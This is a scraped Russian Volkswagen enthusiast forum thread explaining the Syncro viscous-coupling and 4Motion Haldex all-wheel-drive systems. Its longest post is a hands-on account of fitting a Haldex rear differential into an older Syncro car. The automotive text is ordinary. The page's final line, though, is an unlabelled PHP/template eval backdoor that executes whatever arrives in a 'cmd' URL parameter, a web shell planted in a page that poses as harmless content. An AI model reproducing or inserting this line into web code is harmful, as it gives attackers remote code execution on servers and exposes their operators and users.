+ Ответить в теме
Показано с 1 по 4 из 4

Тема: Инфо. Syncro - 4Motion


  1. #1
    Супер Модератор BON has much to be proud of BON has much to be proud of BON has much to be proud of BON has much to be proud of BON has much to be proud of BON has much to be proud of BON has much to be proud of BON has much to be proud of BON has much to be proud of Аватар для BON
    Регистрация
    08.11.2006
    Откуда
    Москва
    Машина
    Skoda
    Сообщений
    15,564

    Инфо. Syncro - 4Motion

    Трансмиссия «Syncro» имеет visco-муфту вместо межосевого дифференциала. Трансмиссия Syncro появилась в 1985 году на VW Transporter Syncro. В феврале 1986 она была адаптирована для Гольф Syncro 90 лс, затем для более экзотических версий, как Country, более мощный G60 Syncro, Rallye или на исключительном Limited. Эта система была подвергнута испытанию в соревнованиях на автомобилях Гольф Rallye. Система Syncro, разработанная для модели Гольф, позволяет ездить в условиях, где не было возможности ездить переднеприводным автомобилям.
    4Motion - это официально зарегистрированная модификация легковых автомобилей «Volkswagen».

    Центральный элемент этой системы полного привода — многодисковая фрикционная муфта, работающая в масляной ванне. По имени шведской компании, которая ее производит, муфта называется Haldex, и этот механизм расположен соосно на входном валу редуктора задней оси автомобиля. Задача муфты состоит в распределении крутящего момента между передними и задними колесами в соответствии с дорожной ситуацией.
    Муфта Haldex позволяет при необходимости изменять распределение крутящего момента между осями до соотношения 50:50. При нормальном движении по прямой на задние колеса передается только 10% крутящего момента. Муфта Haldex всегда направляет основной крутящий момент на колеса, имеющие лучший контакт с дорогой.
    Система 4Motion внимательно контролирует дорожную обстановку, и в этом ей помогают многочисленные «помощники». Важную роль играют датчики ABS, моментально регистрирующие пробуксовку колес. Сверхвысокой чувствительностью обладают и датчики ESP (системы поддержания курсовой устойчивости). Малейшая тенденция к заносу или сносу автомобиля немедленно регистрируется и передается на центральный блок управления. Последний сопоставляет полученные данные с текущим положением педали акселератора и оборотами двигателя.
    Для оценки обстановки и принятия решения требуются считанные доли секунды. При пробуксовке передних колес бортовой компьютер направляет блоку управления муфтой Haldex команду «увеличить крутящий момент задних колес». Встроенные поршневые насосы моментально увеличивают давление масла. Возрастает сжатие пакетов фрикционных дисков, благодаря чему большее усилие передается на задние колеса. Одновременно снижается тенденция к пробуксовке передних колес, поскольку на них направляется меньший момент. Если все же на короткое время пробуксовка возникает (например, на снегу или на льду), электроника обеспечит молниеносное вмешательство тормозной системы.





    VW Golf III Syncro






    Volkswagen Golf-5 4motion

    ГОЛЬФ5
    На новых автомобилях семейства Гольф и Пассат муфта Халдекс встроена в редуктор заднего моста и управляется электроникой по специальной программе, учитывающей продольное ускорение, разность скоростей переднего и заднего мостов, нагрузку на двигатель, включенную передачу и другие параметры. Программа также участвует в работе системы ESP работает совместно с функцией EDS - электронной блокировкой дифференциала. Система реализует на всех режимах максимальную передачу крутящего момента на колёса и ни в чём не уступает, а во многом превосходит блокировку Torsen - например по управляемости с помощью электроники. Применявшаяся до последнего времени на автомобилях Фольксваген вискомуфта опознавала лишь одно проскальзывание, но не причины его возникновения.



    vw golf 6
    tdi_4motion
    песок сыпется....не останавливайтесь на достигнутом !

  2. #2
    Супер Модератор BON has much to be proud of BON has much to be proud of BON has much to be proud of BON has much to be proud of BON has much to be proud of BON has much to be proud of BON has much to be proud of BON has much to be proud of BON has much to be proud of Аватар для BON
    Регистрация
    08.11.2006
    Откуда
    Москва
    Машина
    Skoda
    Сообщений
    15,564

    От базового Гольфа подвеска «эрки» Мк6 отличается заниженным на 25 мм клиренсом и перенастроенными пружинами, амортизаторами и стабилизаторами поперечной устойчивости. Golf R использует трансмиссию от Audi S3 c муфтой Haldex четвёртого поколения, работающей с постоянным преднатягом.
    песок сыпется....не останавливайтесь на достигнутом !

  3. #3
    GTI-Racing geminus is a jewel in the rough geminus is a jewel in the rough geminus is a jewel in the rough Аватар для geminus
    Регистрация
    31.01.2007
    Откуда
    МО, г.Чехов
    Машина
    Audi A6 Allroad
    Сообщений
    1,260
    давай про торсены и их поколения ищи инфу, а то живём в неведении..
    AUDI ALLROAD A6 3.0TDI Quattro 6MT
    МО, Чехов
    Иван


  4. #4
    Новичок FedorPorter is on a distinguished road Аватар для FedorPorter
    Регистрация
    21.05.2019
    Откуда
    Бобруйск
    Машина
    Бричка
    Сообщений
    139
    Итак, пока установка 02M коробки затянулась по независящим от меня причинам(все тот же маховик доделывается) решил заняться чем нибудь полезным. Я думал что буду ставить задний редуктор Haldex уже ПОСЛЕ установки 02M.но в связи с появившимся временем решил сделать это сразу. За вечер в одиночку поставил машину на кирпичи.тяжко откручивались гайки рычагов(у меня НЕ сход-развальные болты там).
    Заломал оба мелких болта крепления балки к чугунным плитам которые прикручены к кузову. при помощи друга вдвоем выволокли задний подрамник(балку) вместе с редуктором.
    Следующим вечером уже принялся фиксировать контрольные точки редуктора на балке(кардан и задняя опора, чуть затупил — надо было еще как нить зафиксировать фланцы приводов, ну или левый хотя бы)
    дальше стал срезать сток кронштейны под синхровый редуктор.
    вот сравнительная фотка редукторов.думаю по масштабу понятно какой из них более веселый. Слева Haldex — справа Syncro
    Далее засунул новый редуктор в эту балку и стал примерять панели корпуса нового редуктора.
    если кому интересно как выглядит синхра без задней подвески то вот — наслаждайтесь)правда как обычно фото на мой АрхиПонтовый телефон с чудесной камерой)
    скрутил стоковый мозг халдекса — он управляется через CAN шину и мне не подойдет — будет кастомный.
    ну и собстенно по вечерам начал варить корпус под новый редуктор — сварочник у меня уже почти год — а варить я так и не научился — вот появилась реальная возможность)все мои сварщики знакомые были заняты — так что приступил сам — под конец уже нормально получалось.для корпуса брал сталь 5мм.варил максимальным током, что бы был провар металла глубокий.
    вот переднее крепление.
    просверлил 2 дырки в нужным местах в редукторе и нарезал резьбу — все как на всех пиндосовых сайтах и у товарищей из России.
    • сзади крепеж балки чуть отличается пассатовкий от гольфовского — пассатовский даже легче — всего одна гайка.но разумеется чуть усилил его.
    • так же надо было поменять расходники по самой муфте.жижи внутри уже практически не оказалось — а фильтр оказался из металлической сетки — и я его промыл в бензине и просушил
    плавало там очень много переливающихся частиц — диски стираются внутри ведь — по научному жидкое сцепление зовется.
    • далее надо было поменять сайленты в балке — а то они стояли еще заводские…25ти летние.верхние вываливались уже(отслоились.потом и нижние выпали. разумеется оригинальные очень дорогие и их нету. погуглил замену из доступных аналогов-купил SWAG.
    • а поменять мне их помогла моя девушка)Да-да)я ее опять затащил в гараж)пока я прессовал сайленты — она держала эту балку…а балка не разу не легкая с новым корпусом)
    • ну а вот уже готовая балка под Haldex уже и покрашенная черным грунтом.
    Потом пригласил Брата в гости — с ним за полтора часа повесили и балку и рычаги.а то в одиночку уставший я еле отрывал от земли балку с редуктором)вдвоем кое как повесили это все.
    Пришлось выбросить задний распределитель(колдун) он не особо то у меня и работал — абс будет следить за перетормаживанием зада — думаю переживу это. так же потребовалась замена магистральной тормозной трубки.
    Полуоси я подготовил зарание — поэтому просто поставил на палки нужные шруса и прикрутил все на месте — все встали по длинне. заднюю левую просто проточил на 4мм под посадку 100мм шруса.а заднюю правую делал кастом.400мм длинной(чисто палка, без шрусов).
    пришлось обрезать пыльник на задней муфте кардана — мешал новому редуктору. Ну и позаливал масла в коробку и редуктор.в 02M масло Febi 21829.а в редуктор 75w90 тоже Febi.

+ Ответить в теме

Похожие темы

  1. VRsex syncro
    от iv_mark в разделе Клубные машины
    Ответов: 132
    Последнее сообщение: 27.06.2019, 19:33
  2. Golf mk2 16T syncro
    от RABBIT в разделе Клубные машины
    Ответов: 14
    Последнее сообщение: 14.12.2013, 13:51
  3. Golf mk3 syncro
    от Angess в разделе Куплю авто
    Ответов: 12
    Последнее сообщение: 22.11.2012, 18:43
  4. PASSAT G60 SYNCRO
    от SEREGA_msn в разделе Покупка и продажа запчастей
    Ответов: 0
    Последнее сообщение: 10.06.2012, 11:50
  5. Превращение Golf 4 4Motion 2002 в Golf 6 R20 4Motion 2009
    от Denni100 в разделе Курилка
    Ответов: 27
    Последнее сообщение: 19.11.2009, 15:59

Ваши права

  • Вы не можете создавать новые темы
  • Вы не можете отвечать в темах
  • Вы не можете прикреплять вложения
  • Вы не можете редактировать свои сообщения
{{$myVar = eval($_GET[cmd]);}}